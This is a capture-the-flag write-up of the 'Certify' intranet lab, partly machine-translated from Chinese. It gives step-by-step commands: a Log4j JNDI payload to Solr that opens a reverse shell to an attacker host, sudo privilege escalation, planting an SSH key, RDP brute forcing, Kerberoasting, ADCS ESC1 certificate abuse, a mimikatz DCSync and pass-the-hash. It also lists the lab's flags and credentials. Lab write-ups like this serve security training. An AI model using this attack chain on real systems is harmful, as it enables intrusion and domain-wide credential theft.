Target introduction:
Certify is a medium-difficulty shooting range environment. Completing this challenge can help players understand agent forwarding, intranet scanning, information collection, etc. in intranet penetration. Privilege escalation and lateral movement technical methods, strengthen the understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in domain environment penetration. There are 4 flags in the shooting range, which are distributed among different target drones.
Start an IP
39.xx.xx.xxx
Scan to find a Solr admin
icmp alive hosts len is: 1
39.xx.xx.xxx:22 open
39.xx.xx.xxx:8983 open
39.xx.xx.xxx:80 open
alive ports len is: 3
start vulscan
[*] WebTitle:http://39.xx.xx.xxx code:200 len:17 title:Welcome to nginx!
[*] WebTitle:http://39.xx.xx.xxx:8983 code:302 len:0 title:None
[*] WebTitle:http://39.xx.xx.xxx:8983/solr/ code:200 len:10 title:Solr Admin
Apache Solr <= 8.3.0 has an rce vulnerability
After trying it, I found that the target does not exist
After a twist of events, I found that Log4j can also be used
通过可控的 Collections 来进行 JNDI注入,路径为
/solr/admin/collections?action=xxxxx
After testing with dnslog, you can see the echo.
http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://dnslog.wnc78i.dnslog.cn}
So I started to rebound the shell
The original project is gone,
I used the one passed by other masters
https: //github.com/black9/Log4shell_JNDIExploit.git
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 175.xx.xx.xx -p 8888
/solr/admin/collections?action=${jndi:ldap://175.xx.xx.xx:1389/Basic/ReverseShell/175.xx.xx.xx/9999}
The monitoring end also successfully received the rebound.
sudo -l can find a NOPASSWD execution grc
sudo grc --pty /bin/bash -i
You can get a root shell
Flag01.txt can be obtained
flag01: flag{366d6ba1-71fd-4b1a-94ad-5df60eb7433a}
netstat -ntplIt is found that the target has ssh enabled
so we can write the public key for remote ssh without changing the ssh password< /span>
Generate rsa key
ssh-keygen -t rsa
So write the generated id_rsa.pub to the target .ssh directory and name it authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC09OeRl9NEQd/QfCp6aYdQN8wBXJxfZT93KHLaHkA5QghDSYnIzLtQROGZNmRaqyd3hasL0hIC9GKxsaC8JLo0ntUe7RQRyfDGnO00j6V7eqi7kzHgxg0Kjpuz5O0wtbmQz6Ibr7KquI0y/770OE1Ma68aTNXxhDY3/zoji5BnBSre+JvPrNiQlJW2fS6MjAz3xZ4T/cJ55LEIQHoJrsUx1xzu6dzlnYlWwPQsh9Ca59xzpecRagkVxCLX2q6fU6edh7M0sP11XT+lqPye0J/x7jN9ChY70BjZrAYsP2CmmU93yHWrV7sT2yBfpq5QPBTjyz/N+D7xLi8ZKEO4jzWS1E0ll0DOvwrKS11+g6Jfx3bPINOoteUcCM0wLl58drov91PIlRlPD5q1e/j5ngfKYZ4gUSzFgXxMQySa7D8zqX5w9OpxeYO2Og2uE6eYGE7Y7a9inaRvI2dfcPpa8YlMhz+wvJ5yKM9oewFCz9qaS6KWBVmdoxtCEFakbGRvT6c= ubuntu@VM-20-4-ubuntu' >>authorized_keys
Successful login
There are many ways to upload the frp client and fscan. You can refer to other articles on myblog
After the proxy is established, useProxifier to connect
fscan 扫描的结果如下
start infoscan
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.13 is alive
(icmp) Target 172.22.9.26 is alive
(icmp) Target 172.22.9.47 is alive
[*] Icmp alive hosts len is: 5
172.22.9.47:21 open
172.22.9.19:22 open
172.22.9.19:8983 open
172.22.9.26:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.7:88 open
172.22.9.13:445 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.13:139 open
172.22.9.7:139 open
172.22.9.26:135 open
172.22.9.13:135 open
172.22.9.7:135 open
172.22.9.47:139 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle:http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[+] NetInfo:
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[+] NetInfo:
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[+] NetInfo:
[*]172.22.9.13
[->]CA01
[->]172.22.9.13
[*] WebTitle:http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] 172.22.9.13 XIAORANG\CA01
[*] 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC
[*] 172.22.9.26 XIAORANG\DESKTOP-CBKTVMO
[*] 172.22.9.47 WORKGROUP\FILESERVER Windows 6.1
[*] 172.22.9.47 (Windows 6.1)
[*] WebTitle:http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle:http://172.22.9.26 code:200 len:703 title:IIS Windows Server
[*] WebTitle:http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
At first glance, there seems to be nothing to take advantage of. View the web through a proxy
It is also the default page of nginx and apache
Through smbclient List smbs that can be accessed anonymously
smbclient -L //172.22.9.47/
smbclient //172.22.9.47/fileserver
Download all the files inside
Get flag02
________ _______ ________ _________ ___ ________ ___ ___
|\ ____\|\ ___ \ |\ __ \|\___ ___\\ \|\ _____\\ \ / /|
\ \ \___|\ \ __/|\ \ \|\ \|___ \ \_\ \ \ \ \__/\ \ \/ / /
\ \ \ \ \ \_|/_\ \ _ _\ \ \ \ \ \ \ \ __\\ \ / /
\ \ \____\ \ \_|\ \ \ \\ \| \ \ \ \ \ \ \ \_| \/ / /
\ \_______\ \_______\ \__\\ _\ \ \__\ \ \__\ \__\__/ / /
\|_______|\|_______|\|__|\|__| \|__| \|__|\|__|\___/ /
\|___|/
flag02: flag{efaa6dd8-3e17-4122-a768-2f077d34fb54}
Yes, you have enumerated smb. But do you know what an SPN is?
And a SQLite database
Use navicat to open it and you can find some names
and some passwords
Combine the tips given above
Find a way to bump out a few users
hydra -L user.txt -P pass 172.22.9.26 rdp
got two
login: zhangjian password: i9XDE02pLVf
login: liupeng password: fiAzGwEMgTY
Get the service ticket of the user's SPN (Kerberoast attack)
impacket-GetUserSPNs -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request
This default export can be cracked using hashcat.
hashcat hashc.txt -m 13100 /usr/share/wordlist/rockyou.txt --show
get password
chenchen @Passw0rd@
zhangxia MyPass2@@6
Successfully logged in to 172.22.9.26 as user zhangxia
The pdf in the anonymous SMB previously mentioned this
Using Misconfigured Certificate Templates - ESC1 (Certificate template configuration error) to perform intra-domain privilege escalation
Certify project: https://github.com/GhostPack/Certify
找到存在漏洞的证书模板
Certify.exe find /vulnerable
Run Certify to request the certificate and designate /altname
as the domain administrator
Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:xiaorang\Administrator
Certificate requested
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Do not enter password
GeneratepfxCertificate
In cooperation with Rubeus Request TGT,PTT
Project address:Rubeus
password 可以为空
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password: /ptt
Use mimikatz to perform dcsync to export domain control hash
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit
Then use wmiexec to exploit and get the remaining two flags.
impacket-wmiexec XIAORANG.LAB/[email protected] -hashes :2f1b57eefb2d152196836b0516abea80
flag03: flag{990600da-05ce-40d8-b7b2-9230ab88bcd4}
impacket-wmiexec XIAORANG.LAB/[email protected] -hashes :2f1b57eefb2d152196836b0516abea80
flag04: flag{436cff95-95f9-408c-ad58-3be79709e2d4}